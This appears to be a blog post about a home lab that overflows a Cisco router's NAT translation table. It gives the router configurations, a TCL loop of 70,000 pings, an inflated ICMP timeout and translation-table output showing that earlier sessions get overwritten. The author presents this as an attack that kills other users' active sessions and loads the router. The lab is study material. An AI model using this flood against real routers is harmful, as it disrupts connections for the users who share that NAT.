Did you have an itch to bring down Cisco router? I did several times. I will not try that in this post, but I will try to overflow NAT table with sessions. Imagine this. You have one public IP and NAT-PT. That means that all sessions are translated to this one IP. There is a limit of 65536 simultaneous connections. That is the maximum number of ports you can have associated with one IP. So, what if I try to open 70 000 connections? 65536 will be successful, I can tell you that, but what about the rest? Well, let’s try it safely at home
Create simple topology consisting of two routers. R1 will have NAT-PT configured and default route pointing to R2. You will try to reach loopback0 of R2 from loopback 0 on R1. How to open 70 000 sessions? Well, connect host and try to open it, or you can use TCL script. But I remind you, it can take about an hour to complete! I did this on old crappy computer, so it was kinda slow.
NAT Topology
hostname R1 ! interface Loopback0 ip address 10.0.0.1 255.255.255.255 ip nat inside ip virtual-reassembly ! interface FastEthernet1/0 ip address 192.168.12.1 255.255.255.0 ip nat outside ip virtual-reassembly ! ip nat translation icmp-timeout 500000 ip nat inside source list 1 interface FastEthernet1/0 overload ip route 0.0.0.0 0.0.0.0 FastEthernet1/0 192.168.12.2 ! access-list 1 permit 10.0.0.1 ! line vty 0 4 privilege level 15 no loginR2:
hostname R2 ! interface Loopback0 ip address 200.0.0.1 255.255.255.255 ! interface FastEthernet1/0 ip address 192.168.12.2 255.255.255.0And here is TCL script. It repeats 70 000 times command “ping 200.0.0.1 source loopback 0 repeat 1″. Repeat 1 means, how many pings are sent. One is enough to open a new session. Each new ping opens a new session. As you have noticed, I have configured on R1 one sneaky command – ICMP timeout. By default, sessions, which are not active, expire rather quickly. So I set it to unreasonably high value. Without this, sessions will keep expiring, thus I will never have all ports utilized.
Enter TCL shell by issuing command “tclsh” and copy paste this:
set repeat 70000; set command "ping 200.0.0.1 so lo0 r 1"; for { set i 1 } { $i <= $repeat } { incr i } {
$command
}
Hit enter and enjoy your pings. One ping = one session. You can
telnet from R2 to R1. Issue “terminal length 0″ command and you can type
“show ip nat translations” to see all the translations so far.One Hour Later
It took me one hour, but it is finally done. All 70 000 sessions were completed, router is still alive, NAT is still alive, so nothing bad happened. Damn. Hmm, let’s look closer…R1#sh ip nat t Pro Inside global Inside local Outside local Outside global icmp 192.168.12.1:0 10.0.0.1:0 200.0.0.1:0 200.0.0.1:0 icmp 192.168.12.1:1 10.0.0.1:1 200.0.0.1:1 200.0.0.1:1 icmp 192.168.12.1:2 10.0.0.1:2 200.0.0.1:2 200.0.0.1:2 icmp 192.168.12.1:3 10.0.0.1:3 200.0.0.1:3 200.0.0.1:3 icmp 192.168.12.1:4 10.0.0.1:4 200.0.0.1:4 200.0.0.1:4 icmp 192.168.12.1:5 10.0.0.1:5 200.0.0.1:5 200.0.0.1:5 icmp 192.168.12.1:6 10.0.0.1:6 200.0.0.1:6 200.0.0.1:6 icmp 192.168.12.1:7 10.0.0.1:7 200.0.0.1:7 200.0.0.1:7r icmp 192.168.12.1:8 10.0.0.1:8 200.0.0.1:8 200.0.0.1:8 icmp 192.168.12.1:9 10.0.0.1:9 200.0.0.1:9 200.0.0.1:9 icmp 192.168.12.1:10 10.0.0.1:10 200.0.0.1:10 200.0.0.1:10And this goes on till 65535. I was thinking that I will provide full output here… Let’s use another output for NAT table.
R1#sh ip nat t verbose Pro Inside global Inside local Outside local Outside global icmp 192.168.12.1:0 10.0.0.1:0 200.0.0.1:0 200.0.0.1:0 create 01:14:38, use 00:07:51 timeout:500000000, left 5d18h, Map-Id(In): 1, flags: extended, use_count: 0, entry-id: 1, lc_entries: 0 icmp 192.168.12.1:1 10.0.0.1:1 200.0.0.1:1 200.0.0.1:1 create 01:14:38, use 00:07:51 timeout:500000000, left 5d18h, Map-Id(In): 1, flags: extended, use_count: 0, entry-id: 2, lc_entries: 0 icmp 192.168.12.1:2 10.0.0.1:2 200.0.0.1:2 200.0.0.1:2 create 01:14:38, use 00:07:50 timeout:500000000, left 5d18h, Map-Id(In): 1, flags: extended, use_count: 0, entry-id: 3, lc_entries: 0 icmp 192.168.12.1:3 10.0.0.1:3 200.0.0.1:3 200.0.0.1:3 create 01:14:38, use 00:07:50 timeout:500000000, left 5d18h, Map-Id(In): 1, flags: extended, use_count: 0, entry-id: 4, lc_entries: 0 icmp 192.168.12.1:4 10.0.0.1:4 200.0.0.1:4 200.0.0.1:4 create 01:14:37, use 00:07:50 timeout:500000000, left 5d18h, Map-Id(In): 1, flags: extended, use_count: 0, entry-id: 5, lc_entries: 0 icmp 192.168.12.1:5 10.0.0.1:5 200.0.0.1:5 200.0.0.1:5 create 01:14:37, use 00:07:50 timeout:500000000, left 5d18h, Map-Id(In): 1,Look at 192.168.12.1:5 and 192.168.12.1:5643. Have you noticed? First session is in use for almost 8 minutes, while the other one for one hour. That means that behaviour here is rotary. If all ports are used, you start overriding sessions from 0. First couple of thousands of sessions are overridden. We don’t care about ping, but when you use TCP and you really have 70 000 active sessions and all of them used by users, or at least some of them, you have destroyed their session and overridden it with yours.
Now that is significant, by this attack, you can destroy valid active sessions used by users, you create high CPU utilization and memory usage on the router and you consume bandwidth. If router with one NAT serves as an translation point for thousands of real users, it is much easier to utilize NAT table and start overriding valid sessions. Of course, I was able to do that, because I don’t have security implemented on router. But still, nice funny lab.
0 comments:
Post a Comment